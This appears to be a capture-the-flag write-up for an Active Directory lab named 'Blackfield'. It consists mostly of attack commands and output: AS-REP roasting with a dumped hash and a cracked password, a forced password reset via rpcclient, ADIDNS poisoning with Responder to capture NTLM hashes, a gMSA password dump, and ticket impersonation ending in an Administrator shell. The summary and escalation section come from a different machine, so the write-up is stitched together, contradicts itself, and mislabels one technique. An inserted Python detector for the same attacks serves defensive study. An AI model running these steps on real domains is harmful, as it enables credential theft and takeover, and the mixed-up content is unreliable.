Blackfield
Summary
Multiple open ports revealed an Active Directory environment (LDAP, Kerberos, SMB, DNS, HTTP).
Extracted usernames from the metadata of .pdf files found via directory fuzzing. Discovered a default password in an internal onboarding document.
Gained an initial shell via SMB share enumeration using valid credentials.
Discovered a PowerShell script that sends web checks to DNS records, enabling an ADIDNS-based NTLM relay.
Captured Ted.Graves's NTLM hash using Responder and cracked it.
Used BloodHound to find the ReadGMSAPassword privilege on the svc_int account. Retrieved the svc_int hash using gMSADumper and generated a Silver Ticket as Administrator.
Gained full access via Kerberos-authenticated wmiexec.py.
🧵 Let's Unpack
🔍 Enumeration
sudo nmap -sC -sV -A -T5 -p- 10.10.10.248
Open ports included:
LDAP (389, 636, 3268, 3269)
Kerberos (88, 464)
SMB (139, 445)
HTTP (80, 5985)
DNS (53)
RPC (135, 593, 49667+)
Others related to Active Directory services
Anonymous SMB enumeration using enum4linux and smbclient revealed no useful info, but identified the domain: intelligence.htb.
RPCClient
rpcclient $> lsaquery
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
SMB Client
# using nmblookup
nmblookup -A 10.10.10.192
# smbclient
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
# crackmapexec
crackmapexec smb 10.10.10.192 -u '' -p '' -M spider_plus
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\:
SPIDER_P... 10.10.10.192 445 DC01 [*] Started spidering plus with option:
SPIDER_P... 10.10.10.192 445 DC01 [*] DIR: ['print$']
SPIDER_P... 10.10.10.192 445 DC01 [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.192 445 DC01 [*] SIZE: 51200
SPIDER_P... 10.10.10.192 445 DC01 [*] OUTPUT: /tmp/cme_spider_plus
SMB 10.10.10.192 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
# using MSF
msf6 auxiliary(scanner/smb/smb_lookupsid) > run
[*] 10.10.10.192:445 - PIPE(LSARPC) LOCAL(BLACKFIELD - 5-21-4194615774-2175524697-3563712290) DOMAIN(BLACKFIELD - 5-21-4194615774-2175524697-3563712290)
[*] 10.10.10.192:445 - BLACKFIELD [ ]
# enum4linux
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
## DC
domain Controller -> blackfield.local
Kerbrute Enum
kerbrute userenum -d dc01.blackfield.local /usr/share/seclists/Usernames/top-usernames-shortlist.txt
2024/06/12 23:50:12 > [+] VALID USERNAME: audit2020@blackfield.local
2024/06/12 23:52:13 > [+] support has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$support@BLACKFIELD.LOCAL:cc6939c0b17716f2ed1778099b862921$…
2024/06/12 23:52:13 > [+] VALID USERNAME: support@blackfield.local
2024/06/12 23:52:19 > [+] VALID USERNAME: svc_backup@blackfield.local
Cracking the hash - AS-REP token
sudo hashcat -m 18200 hash.asrep /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
# Cracked the hash using john instead
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)
Enumerating using valid credentials
# Running Bloodhound
bloodhound-python -d blackfield.local -u support -p '<PASS>' -ns 10.10.10.192 -c All
Findings
The user SUPPORT@BLACKFIELD.LOCAL has the capability to change the user AUDIT2020@BLACKFIELD.LOCAL's password without knowing that user's current password.
Let's try to change the password using rpcclient
# log into rpcclient
rpcclient -U "support" 10.10.10.192
# change password (Incorrect way of changing password)
chgpasswd audit2020@blackfield.local Password@123 Password@123
# correct way
setuserinfo2 audit2020 23 'Password@123'
# verify if password change was a success
crackmapexec smb 10.10.10.192 -u audit2020@blackfield.local -p 'Password@123' --continue-on-success
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020@blackfield.local:Password@123
The computer DC01.BLACKFIELD.LOCAL has the DS-Replication-Get-Changes and the DS-Replication-Get-Changes-All privilege on the domain BLACKFIELD.LOCAL.
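As an added defensive check (not part of the original writeup), the following script flags the two events a domain controller would log for the steps above: a 4768 TGT request with pre-authentication type 0 (the "no pre auth required" condition kerbrute found on support) and a 4724 password reset performed by another principal (the setuserinfo2 change to audit2020). The event records are constructed inline; the field names assume Security log entries already parsed into dicts.

```python
"""Detection helpers for AS-REP roasting (Security event 4768, pre-auth type 0)
and password resets by another principal (Security event 4724).
Input is a list of dicts mimicking parsed Windows Security log fields."""
from typing import Dict, FrozenSet, List, Tuple

# Constructed sample events, not real log data. 0x17 = RC4-HMAC, 0x12 = AES256.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "4768", "TargetUserName": "support", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.13"},
    {"EventID": "4768", "TargetUserName": "audit2020", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.192"},
    {"EventID": "4724", "SubjectUserName": "support", "TargetUserName": "audit2020"},
    {"EventID": "4724", "SubjectUserName": "helpdesk01", "TargetUserName": "audit2020"},
]

def flag_asrep_roast(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (account, source IP, reason) for TGT requests issued without
    pre-authentication; that is the condition an AS-REP roasting tool relies on."""
    hits = []
    for e in events:
        if e.get("EventID") != "4768" or e.get("PreAuthType") != "0":
            continue
        reason = "TGT issued without pre-authentication (DONT_REQ_PREAUTH set)"
        if e.get("TicketEncryptionType", "").lower() == "0x17":
            reason += "; RC4 encryption, so the hash is cheap to crack offline"
        hits.append((e.get("TargetUserName", "?"), e.get("IpAddress", "?"), reason))
    return hits

def flag_password_resets(events: List[Dict[str, str]],
                         trusted_resetters: FrozenSet[str] = frozenset()) -> List[Tuple[str, str]]:
    """Return (subject, target) for 4724 resets done by a principal that is not
    on the trusted list (helpdesk/admin accounts expected to reset passwords)."""
    hits = []
    trusted = {t.lower() for t in trusted_resetters}
    for e in events:
        if e.get("EventID") != "4724":
            continue
        subj = e.get("SubjectUserName", "").lower()
        tgt = e.get("TargetUserName", "").lower()
        if subj != tgt and subj not in trusted:
            hits.append((subj, tgt))
    return hits

if __name__ == "__main__":
    for hit in flag_asrep_roast(SAMPLE_EVENTS):
        print("AS-REP roast candidate:", hit)
    for hit in flag_password_resets(SAMPLE_EVENTS, frozenset({"helpdesk01"})):
        print("Unexpected password reset:", hit)
```

The AES-only account (audit2020, pre-auth type 2) is not flagged, and a reset by an allow-listed helpdesk account is suppressed while the support-to-audit2020 reset still surfaces.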
Privilege Escalation
Part 1: NTLM Relay via ADIDNS
Exploited ADIDNS record creation via dnstool.py:
./dnstool.py -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' 10.10.10.248 -a add -r webl -d 10.10.14.13 -t A
Ran responder on the attack box and waited for the script to trigger:
sudo responder -I tun0
Captured the NTLMv2 hash for Ted.Graves. Cracked the hash and got creds:
Username: Ted.Graves Password: Mr.Teddy
Part 2: BloodHound & GMSA Abuse
Ran BloodHound collection using bloodhound-python:
bloodhound-python -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -ns 10.10.10.248 -c All
Found that Ted.Graves is part of a group with ReadGMSAPassword rights on svc_int. Dumped the GMSA password using:
./gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -l 10.10.10.248
Output:
svc_int$:aes256-cts-hmac-sha1-96:<HASH>
Part 3: Silver Ticket
Created Silver Ticket as Administrator:
getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :<svc_int_hash>
Exported ticket:
export KRB5CCNAME=Administrator.ccache
Executed command with elevated privileges:
wmiexec.py -k -no-pass dc.intelligence.htb
→ Got shell as Administrator 🎉